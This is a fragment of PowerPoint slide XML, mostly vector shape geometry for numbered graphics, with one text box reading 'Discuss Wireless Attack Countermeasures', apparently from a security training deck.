                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166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61" y="91"/>
                    <a:pt x="66" y="83"/>
                    <a:pt x="69" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="68"/>
                    <a:pt x="74" y="62"/>
                    <a:pt x="74" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="48"/>
                    <a:pt x="72" y="41"/>
                    <a:pt x="69" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="32"/>
                    <a:pt x="61" y="29"/>
                    <a:pt x="56" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="29"/>
                    <a:pt x="45" y="32"/>
                    <a:pt x="42" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="44"/>
                    <a:pt x="37" y="52"/>
                    <a:pt x="37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0" y="44"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="15" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="0"/>
                    <a:pt x="86" y="5"/>
                    <a:pt x="96" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="25"/>
                    <a:pt x="111" y="38"/>
                    <a:pt x="111" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="67"/>
                    <a:pt x="108" y="78"/>
                    <a:pt x="103" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="98"/>
                    <a:pt x="88" y="111"/>
                    <a:pt x="75" y="127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115" y="162"/>
                    <a:pt x="115" y="162"/>
                    <a:pt x="115" y="162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="19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3" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E085E4-2C2B-4EB8-8161-6D497633E9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22327" y="4476531"/>
              <a:ext cx="140038" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 73 w 110"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 54 w 110"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 36 w 110"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 36 w 110"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 155 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 55 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 73 w 110"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 73 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="195">
                  <a:moveTo>
                    <a:pt x="110" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="7"/>
                    <a:pt x="95" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="33"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="55" y="31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49" y="30"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="36" y="59"/>
                    <a:pt x="36" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="136"/>
                    <a:pt x="38" y="148"/>
                    <a:pt x="41" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="162"/>
                    <a:pt x="49" y="165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61" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="73" y="136"/>
                    <a:pt x="73" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="7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4" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB63913-DC3C-42FF-AC9B-483AE0193C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84772" y="4480732"/>
              <a:ext cx="148441" cy="239467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 92 w 106"/>
                <a:gd name="T1" fmla="*/ 107 h 171"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 107 h 171"/>
                <a:gd name="T4" fmla="*/ 106 w 106"/>
                <a:gd name="T5" fmla="*/ 134 h 171"/>
                <a:gd name="T6" fmla="*/ 92 w 106"/>
                <a:gd name="T7" fmla="*/ 134 h 171"/>
                <a:gd name="T8" fmla="*/ 92 w 106"/>
                <a:gd name="T9" fmla="*/ 171 h 171"/>
                <a:gd name="T10" fmla="*/ 58 w 106"/>
                <a:gd name="T11" fmla="*/ 171 h 171"/>
                <a:gd name="T12" fmla="*/ 58 w 106"/>
                <a:gd name="T13" fmla="*/ 134 h 171"/>
                <a:gd name="T14" fmla="*/ 2 w 106"/>
                <a:gd name="T15" fmla="*/ 134 h 171"/>
                <a:gd name="T16" fmla="*/ 0 w 106"/>
                <a:gd name="T17" fmla="*/ 113 h 171"/>
                <a:gd name="T18" fmla="*/ 58 w 106"/>
                <a:gd name="T19" fmla="*/ 0 h 171"/>
                <a:gd name="T20" fmla="*/ 92 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 171"/>
                <a:gd name="T22" fmla="*/ 92 w 106"/>
                <a:gd name="T23" fmla="*/ 107 h 171"/>
                <a:gd name="T24" fmla="*/ 30 w 106"/>
                <a:gd name="T25" fmla="*/ 107 h 171"/>
                <a:gd name="T26" fmla="*/ 58 w 106"/>
                <a:gd name="T27" fmla="*/ 107 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 106"/>
                <a:gd name="T29" fmla="*/ 48 h 171"/>
                <a:gd name="T30" fmla="*/ 58 w 106"/>
                <a:gd name="T31" fmla="*/ 48 h 171"/>
                <a:gd name="T32" fmla="*/ 56 w 106"/>
                <a:gd name="T33" fmla="*/ 51 h 171"/>
                <a:gd name="T34" fmla="*/ 30 w 106"/>
                <a:gd name="T35" fmla="*/ 107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6" h="171">
                  <a:moveTo>
                    <a:pt x="92" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="10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5" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85398CC-3671-42F6-9759-D8B0FC0DC2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4800" y="5114109"/>
              <a:ext cx="141439" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 111"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 111"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="195">
                  <a:moveTo>
                    <a:pt x="111" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="143"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="7"/>
                    <a:pt x="96" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="33"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="37" y="59"/>
                    <a:pt x="37" y="74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37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="49" y="165"/>
                    <a:pt x="55" y="16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2" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="7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6" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B921BE-D4C1-4EC8-B06B-05D680FA9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846" y="5118310"/>
              <a:ext cx="140038" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 111"/>
                <a:gd name="T1" fmla="*/ 105 h 192"/>
                <a:gd name="T2" fmla="*/ 13 w 111"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 105 w 111"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 105 w 111"/>
                <a:gd name="T7" fmla="*/ 30 h 192"/>
                <a:gd name="T8" fmla="*/ 43 w 111"/>
                <a:gd name="T9" fmla="*/ 30 h 192"/>
                <a:gd name="T10" fmla="*/ 39 w 111"/>
                <a:gd name="T11" fmla="*/ 75 h 192"/>
                <a:gd name="T12" fmla="*/ 49 w 111"/>
                <a:gd name="T13" fmla="*/ 68 h 192"/>
                <a:gd name="T14" fmla="*/ 62 w 111"/>
                <a:gd name="T15" fmla="*/ 65 h 192"/>
                <a:gd name="T16" fmla="*/ 98 w 111"/>
                <a:gd name="T17" fmla="*/ 81 h 192"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 128 h 192"/>
                <a:gd name="T20" fmla="*/ 96 w 111"/>
                <a:gd name="T21" fmla="*/ 173 h 192"/>
                <a:gd name="T22" fmla="*/ 55 w 111"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 16 w 111"/>
                <a:gd name="T25" fmla="*/ 177 h 192"/>
                <a:gd name="T26" fmla="*/ 0 w 111"/>
                <a:gd name="T27" fmla="*/ 138 h 192"/>
                <a:gd name="T28" fmla="*/ 1 w 111"/>
                <a:gd name="T29" fmla="*/ 137 h 192"/>
                <a:gd name="T30" fmla="*/ 36 w 111"/>
                <a:gd name="T31" fmla="*/ 135 h 192"/>
                <a:gd name="T32" fmla="*/ 42 w 111"/>
                <a:gd name="T33" fmla="*/ 155 h 192"/>
                <a:gd name="T34" fmla="*/ 55 w 111"/>
                <a:gd name="T35" fmla="*/ 162 h 192"/>
                <a:gd name="T36" fmla="*/ 69 w 111"/>
                <a:gd name="T37" fmla="*/ 153 h 192"/>
                <a:gd name="T38" fmla="*/ 74 w 111"/>
                <a:gd name="T39" fmla="*/ 129 h 192"/>
                <a:gd name="T40" fmla="*/ 69 w 111"/>
                <a:gd name="T41" fmla="*/ 102 h 192"/>
                <a:gd name="T42" fmla="*/ 54 w 111"/>
                <a:gd name="T43" fmla="*/ 92 h 192"/>
                <a:gd name="T44" fmla="*/ 42 w 111"/>
                <a:gd name="T45" fmla="*/ 96 h 192"/>
                <a:gd name="T46" fmla="*/ 36 w 111"/>
                <a:gd name="T47" fmla="*/ 108 h 192"/>
                <a:gd name="T48" fmla="*/ 3 w 111"/>
                <a:gd name="T49" fmla="*/ 105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1" h="192">
                  <a:moveTo>
                    <a:pt x="3" y="105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39" y="75"/>
                    <a:pt x="39" y="75"/>
                    <a:pt x="39" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="45" y="70"/>
                    <a:pt x="49" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="66"/>
                    <a:pt x="57" y="65"/>
                    <a:pt x="62" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="65"/>
                    <a:pt x="89" y="70"/>
                    <a:pt x="98" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="92"/>
                    <a:pt x="111" y="108"/>
                    <a:pt x="111" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="146"/>
                    <a:pt x="106" y="161"/>
                    <a:pt x="96" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="186"/>
                    <a:pt x="73" y="192"/>
                    <a:pt x="55" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="27" y="187"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="168"/>
                    <a:pt x="0" y="154"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="144"/>
                    <a:pt x="38" y="150"/>
                    <a:pt x="42" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="160"/>
                    <a:pt x="50" y="162"/>
                    <a:pt x="55" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="162"/>
                    <a:pt x="66" y="159"/>
                    <a:pt x="69" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="139"/>
                    <a:pt x="74" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="117"/>
                    <a:pt x="72" y="109"/>
                    <a:pt x="69" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="96"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="54" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="92"/>
                    <a:pt x="45" y="94"/>
                    <a:pt x="42" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="99"/>
                    <a:pt x="37" y="103"/>
                    <a:pt x="36" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3" y="10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958C8B45-68FD-4C11-8CCA-3AC65550BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8709" y="4801020"/>
            <a:ext cx="2776992" cy="6697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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366974314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8173100" y="1021080"/>
            <a:ext cx="3657961" cy="1878557"/>
            <a:chOff x="8173100" y="1157414"/>
            <a:chExt cx="3152597" cy="1619026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD52806-04C6-48B1-A1C3-12D73957575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253935" y="1238250"/>
              <a:ext cx="2965519" cy="1455046"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 5660"/>
                <a:gd name="T1" fmla="*/ 0 h 2777"/>
                <a:gd name="T2" fmla="*/ 0 w 5660"/>
                <a:gd name="T3" fmla="*/ 0 h 2777"/>
                <a:gd name="T4" fmla="*/ 4271 w 5660"/>
                <a:gd name="T5" fmla="*/ 0 h 2777"/>
                <a:gd name="T6" fmla="*/ 5659 w 5660"/>
                <a:gd name="T7" fmla="*/ 1389 h 2777"/>
                <a:gd name="T8" fmla="*/ 5659 w 5660"/>
                <a:gd name="T9" fmla="*/ 2776 h 2777"/>
                <a:gd name="T10" fmla="*/ 1388 w 5660"/>
                <a:gd name="T11" fmla="*/ 2776 h 2777"/>
                <a:gd name="T12" fmla="*/ 0 w 5660"/>
                <a:gd name="T13" fmla="*/ 1389 h 2777"/>
                <a:gd name="T14" fmla="*/ 0 w 5660"/>
                <a:gd name="T15" fmla="*/ 0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60" h="2777">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5033" y="0"/>
                    <a:pt x="5659" y="627"/>
                    <a:pt x="5659" y="1389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="621" y="2776"/>
                    <a:pt x="0" y="2151"/>
                    <a:pt x="0" y="1389"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0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  <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C65AFA1-5994-414E-B31F-40DD336AE0C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73100" y="1157414"/>
              <a:ext cx="843003" cy="845312"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1608"/>
                <a:gd name="T1" fmla="*/ 0 h 1614"/>
                <a:gd name="T2" fmla="*/ 0 w 1608"/>
                <a:gd name="T3" fmla="*/ 0 h 1614"/>
                <a:gd name="T4" fmla="*/ 1607 w 1608"/>
                <a:gd name="T5" fmla="*/ 0 h 1614"/>
                <a:gd name="T6" fmla="*/ 0 w 1608"/>
                <a:gd name="T7" fmla="*/ 1613 h 1614"/>
                <a:gd name="T8" fmla="*/ 0 w 1608"/>
                <a:gd name="T9" fmla="*/ 0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8" h="1614">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="892"/>
                    <a:pt x="887" y="1613"/>
                    <a:pt x="0" y="1613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:ln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defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1FCD30-DB57-42A5-9A98-8FEA44AFA04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480385" y="1933437"/>
